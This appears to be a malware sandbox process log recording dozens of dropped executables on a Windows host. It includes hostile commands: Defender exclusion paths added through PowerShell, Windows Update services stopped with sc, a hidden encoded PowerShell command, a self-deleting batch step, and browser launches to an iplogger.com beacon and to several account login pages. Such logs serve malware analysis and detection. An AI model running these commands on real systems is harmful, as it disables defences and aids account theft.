"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:4776

C:\Users\Admin\Desktop\a\difficultspecificprores.exe
"C:\Users\Admin\Desktop\a\difficultspecificprores.exe"
2⤵
PID:8648

C:\Windows\SYSTEM32\cmd.exe
cmd /c difficspec.bat
3⤵
PID:6660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2luJX1
4⤵
PID:4940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
5⤵
PID:9732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1674480281491139874,15994691359720701029,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
5⤵
PID:8832

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\difficultspecific.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\difficultspecific.exe
3⤵
PID:8772

C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exe
C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\callcustomerpro.exe
4⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\callcustomer.exe
C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\callcustomer.exe
5⤵
PID:10832

C:\Users\Admin\Desktop\a\amday.exe
"C:\Users\Admin\Desktop\a\amday.exe"
2⤵
PID:8340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
3⤵
PID:5624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
3⤵
PID:10096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
3⤵
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8340 -s 1364
3⤵
- Program crash
PID:10396

C:\Users\Admin\Desktop\a\rengad.exe
"C:\Users\Admin\Desktop\a\rengad.exe"
2⤵
PID:9104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9104 -s 9752
3⤵
- Program crash
PID:7264

C:\Users\Admin\Desktop\a\Olfumi.exe
"C:\Users\Admin\Desktop\a\Olfumi.exe"
2⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 1480
3⤵
- Program crash
PID:11088

C:\Users\Admin\Desktop\a\carryspend.exe
"C:\Users\Admin\Desktop\a\carryspend.exe"
2⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\towardlowestpro.exe
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\towardlowestpro.exe
3⤵
PID:6868

C:\Users\Admin\Desktop\a\fbinzx.exe
"C:\Users\Admin\Desktop\a\fbinzx.exe"
2⤵
PID:10444

C:\Users\Admin\Desktop\a\sufferdemand.exe
"C:\Users\Admin\Desktop\a\sufferdemand.exe"
2⤵
PID:10880

C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\callcustomerpro.exe
C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\callcustomerpro.exe
3⤵
PID:10940

C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\callcustomer.exe
C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\callcustomer.exe
4⤵
PID:10996

C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\calllcustomer.exe
C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\calllcustomer.exe
4⤵
PID:8528

C:\Users\Admin\Desktop\a\windows.exe
"C:\Users\Admin\Desktop\a\windows.exe"
2⤵
PID:8232

C:\Users\Admin\Desktop\a\netTimer.exe
"C:\Users\Admin\Desktop\a\netTimer.exe"
2⤵
PID:10440

C:\Users\Admin\Desktop\a\1712.exe
"C:\Users\Admin\Desktop\a\1712.exe"
2⤵
PID:9252

C:\Users\Admin\Desktop\a\kung.exe
"C:\Users\Admin\Desktop\a\kung.exe"
2⤵
PID:2816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 1120
3⤵
- Program crash
PID:7844

C:\Users\Admin\Desktop\a\Kriwgshughb.exe
"C:\Users\Admin\Desktop\a\Kriwgshughb.exe"
2⤵
PID:412

C:\Users\Admin\Desktop\a\zoeg4a5.exe
"C:\Users\Admin\Desktop\a\zoeg4a5.exe"
2⤵
PID:8628

C:\Users\Admin\Desktop\a\cllip.exe
"C:\Users\Admin\Desktop\a\cllip.exe"
2⤵
PID:6352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s4wg.0.bat" "
3⤵
PID:8916

C:\Windows\SysWOW64\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:8588

C:\Users\Admin\Desktop\a\audiodg.exe
"C:\Users\Admin\Desktop\a\audiodg.exe"
2⤵
PID:5088

C:\Users\Admin\Desktop\a\HTMLc.exe
"C:\Users\Admin\Desktop\a\HTMLc.exe"
2⤵
PID:10076

C:\Users\Admin\Desktop\a\HTML.exe
"C:\Users\Admin\Desktop\a\HTML.exe"
2⤵
PID:11004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 11004 -s 1208
3⤵
- Program crash
PID:7556

C:\Users\Admin\Desktop\a\3.exe
"C:\Users\Admin\Desktop\a\3.exe"
2⤵
PID:10364

C:\Users\Admin\Desktop\a\conhost.exe
"C:\Users\Admin\Desktop\a\conhost.exe"
2⤵
PID:5340

C:\Users\Admin\Desktop\a\svchost.exe
"C:\Users\Admin\Desktop\a\svchost.exe"
2⤵
PID:5216

C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe
C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6f0c5648,0x6f0c5658,0x6f0c5664
1⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UioIvCfSFyQqegJt14pRzsdR.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UioIvCfSFyQqegJt14pRzsdR.exe" --version
1⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\umesd.exe
"C:\Users\Admin\AppData\Local\Temp\umesd.exe"
1⤵
PID:5256

C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe
"C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5996 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231028174002" --session-guid=a86e3ff4-2ed2-401a-83e1-62578d181882 --server-tracking-blob=ZWE4YjBkOTJmYTAwZjJjZjEzMmQ2NGNjZWQxYTkzOGQxZDVkOGI2N2U3YjFjZmEyOTI5ZDNiZGQ1NjdhM2RmZDp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODUxNDc5OC4yOTM4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4M2E4OThiNS1mZDczLTRjZjUtYThlOS0yMGIxZTgxNzFhN2IifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC04000000000000
1⤵
PID:5796

C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe
C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x31c,0x320,0x324,0x2ec,0x328,0x6e045648,0x6e045658,0x6e045664
2⤵
PID:4724

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\umesd.exe"
2⤵
PID:6696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sf6Dl4ES.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sf6Dl4ES.exe
1⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ZI3ql1xK.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ZI3ql1xK.exe
2⤵
PID:6380

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\QF1HN9YF.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\QF1HN9YF.exe
3⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Yg5ZZ4DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Yg5ZZ4DV.exe
1⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Bl26Xw0.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Bl26Xw0.exe
2⤵
PID:6592

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 544
4⤵
- Program crash
PID:6864

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2GL930jl.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2GL930jl.exe
2⤵
PID:5628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:7144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5768 -ip 5768
1⤵
PID:6708

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6532

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:6732

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2736

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:3808

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:388

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2028 -ip 2028
1⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6920 -ip 6920
1⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\5F33.exe
C:\Users\Admin\AppData\Local\Temp\5F33.exe
1⤵
PID:4800

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sf6Dl4ES.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sf6Dl4ES.exe
2⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\ZI3ql1xK.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\ZI3ql1xK.exe
3⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\QF1HN9YF.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\QF1HN9YF.exe
4⤵
PID:6540

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Yg5ZZ4DV.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Yg5ZZ4DV.exe
5⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1Bl26Xw0.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1Bl26Xw0.exe
6⤵
PID:5228

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 540
8⤵
- Program crash
PID:6720

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2GL930jl.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2GL930jl.exe
6⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\6251.exe
C:\Users\Admin\AppData\Local\Temp\6251.exe
1⤵
PID:2720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7096 -ip 7096
1⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\685E.exe
C:\Users\Admin\AppData\Local\Temp\685E.exe
1⤵
PID:836

C:\Windows\SysWOW64\typeperf.exe
"C:\Windows\SysWOW64\typeperf.exe"
2⤵
PID:11036

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\6A34.exe
C:\Users\Admin\AppData\Local\Temp\6A34.exe
1⤵
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\657F.bat" "
1⤵
PID:2636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
2⤵
PID:6844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
3⤵
PID:6888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
3⤵
PID:7296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
3⤵
PID:7288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
3⤵
PID:7392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
3⤵
PID:7720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
3⤵
PID:7712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
3⤵
PID:7988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
3⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
3⤵
PID:8544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
3⤵
PID:9472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
3⤵
PID:9464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
3⤵
PID:10108

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
3⤵
PID:972

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5776 /prefetch:8
3⤵
PID:9276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
3⤵
PID:9356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
3⤵
PID:8244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
3⤵
PID:9724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4012 /prefetch:2
3⤵
PID:4560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2252,15180341161602097867,11004303267359454301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
3⤵
PID:10112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
2⤵
PID:7148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
3⤵
PID:1352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
2⤵
PID:2140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
2⤵
PID:3336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
2⤵
PID:9048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
2⤵
PID:752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
2⤵
PID:7868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
2⤵
PID:9916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
3⤵
PID:10788

